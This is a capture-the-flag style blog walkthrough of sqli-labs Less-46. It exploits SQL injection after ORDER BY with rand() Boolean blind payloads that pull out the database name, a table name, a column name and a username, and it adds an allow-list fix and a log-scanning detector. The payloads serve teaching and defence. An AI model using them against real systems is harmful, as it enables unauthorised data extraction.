SQL injection Less46 (injection after order by + rand() Boolean blind injection)
2022-07-31 02:47:00 【happy star】
$id = $_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
Our injection point is the parameter after ORDER BY. Unlike an injection point after WHERE, the ORDER BY position does not accept a second SELECT, so UNION-based injection and similar techniques cannot be used here.
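As an added example (not code from the original post or from sqli-labs), here is the vulnerable pattern from Less-46 beside a hardened version that resolves the sort parameter through an allow-list instead of pasting it into the query. The `users` table and its columns are constructed for the demo, and SQLite stands in for MySQL; the point is that a rejected value such as `rand(1=1)` never reaches the SQL engine.

```python
import sqlite3

# Allow-lists: the client-supplied token on the left is mapped to the column or
# keyword that actually reaches SQL. Table and column names are constructed for
# this demo (assumption: a users table with id/username/password).
SORT_COLUMNS = {"1": "id", "2": "username", "3": "password",
                "id": "id", "username": "username"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_query_unsafe(sort_param):
    """The pattern on the page: the raw parameter is pasted after ORDER BY."""
    return "SELECT * FROM users ORDER BY " + sort_param


def build_query_safe(sort_param):
    """Resolve '<column> [asc|desc]' through the allow-lists.
    Raises ValueError for anything else, so rand()/subqueries never reach SQL."""
    parts = sort_param.strip().split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("sort must be '<column> [asc|desc]'")
    column = SORT_COLUMNS.get(parts[0].lower())
    if column is None:
        raise ValueError("unknown sort column: %r" % parts[0])
    direction = "ASC"
    if len(parts) == 2:
        direction = SORT_DIRECTIONS.get(parts[1].lower())
        if direction is None:
            raise ValueError("bad sort direction: %r" % parts[1])
    return "SELECT * FROM users ORDER BY %s %s" % (column, direction)


def is_accepted(sort_param):
    """True if the hardened builder would accept this parameter."""
    try:
        build_query_safe(sort_param)
        return True
    except ValueError:
        return False


def sorted_usernames(sort_param):
    """Run the hardened query against an in-memory SQLite table filled with
    constructed rows and return the usernames in result order."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "pw1"), (2, "Angelina", "pw2"), (3, "Dummy", "pw3")])
    rows = conn.execute(build_query_safe(sort_param)).fetchall()
    conn.close()
    return [row[1] for row in rows]


if __name__ == "__main__":
    for p in ["1 desc", "2", "rand(1=1)", "rand(length(database())=8)"]:
        print(p, "->", build_query_unsafe(p))
        print("    accepted by allow-list:", is_accepted(p))
    print(sorted_usernames("username asc"))
```

Parameterised queries do not help for ORDER BY, because a bound parameter is treated as a constant rather than a column reference; the mapping above is the usual fix.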
Testing the injection point
?sort=1 desc
?sort=1 asc
desc (descend) sorts in descending order; asc (ascend) sorts in ascending order.
The two responses differ, which shows that the parameter is injectable: expressions placed after ORDER BY influence the result.
The following part has nothing to do with solving the level; skip ahead to the Boolean blind injection section if you only want the solution.
?sort=right(version(),1)
?sort=left(version(),1)
The returned results are all
I think it may be a number of character type, so I tried again.
I don't know if the type conversion will be done automatically
?sort=5
?sort='5'
So, left(version(),1) should indeed return a number of character type.
Boolean blind injection
select * from users order by rand();
This sorts the users table randomly.
rand() returns a floating-point number between 0 and 1, while ORDER BY is normally followed by a column name or column number.
In effect, a rand field has been added to the users table whose value is generated randomly for each row; sorting the table by that field produces the random order.
For more on the principle, see MySQL-17: order by rand().
select * from users order by rand(1);
select * from users order by rand(0);
?sort=rand(1)
?sort=rand(0)
A seeded rand() produces a repeatable sequence, so rand(1) and rand(0) each give a fixed but different row order. A comparison inside the call evaluates to 1 (true) or 0 (false), so rand(condition) behaves like rand(1) or rand(0), and the order of the returned rows reveals whether the condition holds:
?sort=rand(1=1)
?sort=rand(length(database())=8)
?sort=rand(ascii(substr(database(),1,1))=115)
?sort=rand(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101)
?sort=rand(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i')
?sort=rand(ascii(substr((select username from users limit 0,1), 1,1))=68)
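From the defender's side, the payloads above all share the same shape in the web server log: a `sort` parameter that is not a plain column name or position. The following is an added example (not part of the original post) that scans constructed Apache-style access log lines, URL-decodes the `sort` value, and flags anything that fails a strict column/direction pattern, listing which of the page's function markers it contains. The log lines and IP addresses are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access log lines (not real traffic). The last two carry ORDER BY
# payloads of the kind shown on the page, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jul/2022:02:47:00 +0800] "GET /Less-46/?sort=1 HTTP/1.1" 200 1432
10.0.0.5 - - [31/Jul/2022:02:47:01 +0800] "GET /Less-46/?sort=2%20desc HTTP/1.1" 200 1432
10.0.0.9 - - [31/Jul/2022:02:47:05 +0800] "GET /Less-46/?sort=rand(length(database())%3D8) HTTP/1.1" 200 1432
10.0.0.9 - - [31/Jul/2022:02:47:06 +0800] "GET /Less-46/?sort=rand(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema%3Ddatabase()%20limit%200,1),1,1))%3D101) HTTP/1.1" 200 1432
"""

# Common log format: ip ident user [time] "METHOD target HTTP/x" status size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')

# A legitimate sort value: a column position or identifier, optionally with a direction.
BENIGN_SORT_RE = re.compile(
    r'^([0-9]+|[A-Za-z_][A-Za-z0-9_]*)(\s+(asc|desc))?$', re.IGNORECASE)

# Function and schema markers that appear in the page's payloads.
MARKERS = ("rand(", "ascii(", "substr(", "information_schema",
           "select ", "sleep(", "database(")


def classify_sort(value):
    """Return the reasons a decoded sort value looks like ORDER BY injection.
    An empty list means it matched the benign pattern."""
    if BENIGN_SORT_RE.match(value):
        return []
    reasons = ["not a plain column/direction"]
    lowered = value.lower()
    reasons += [m for m in MARKERS if m in lowered]
    return reasons


def scan_log(text):
    """Return (ip, decoded sort value, reasons) for every request whose sort
    parameter fails the benign pattern."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for raw in parse_qs(query, keep_blank_values=True).get("sort", []):
            # parse_qs already decoded once; a second pass catches double encoding.
            value = unquote_plus(raw)
            reasons = classify_sort(value)
            if reasons:
                findings.append((m.group("ip"), value, reasons))
    return findings


if __name__ == "__main__":
    for ip, value, reasons in scan_log(SAMPLE_LOG):
        print(ip, repr(value), ", ".join(reasons))
```

In practice the same check belongs at the application boundary (reject the value before it reaches SQL); the log scan is for finding attempts after the fact and for building a rule in a WAF or SIEM.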
Of course, this level can also be solved with time-based blind injection or error-based injection; Less-47 will be solved with error-based injection.
https://blog.csdn.net/Kevinhanser/article/details/81563461
https://blog.csdn.net/weixin_43901998/article/details/107577630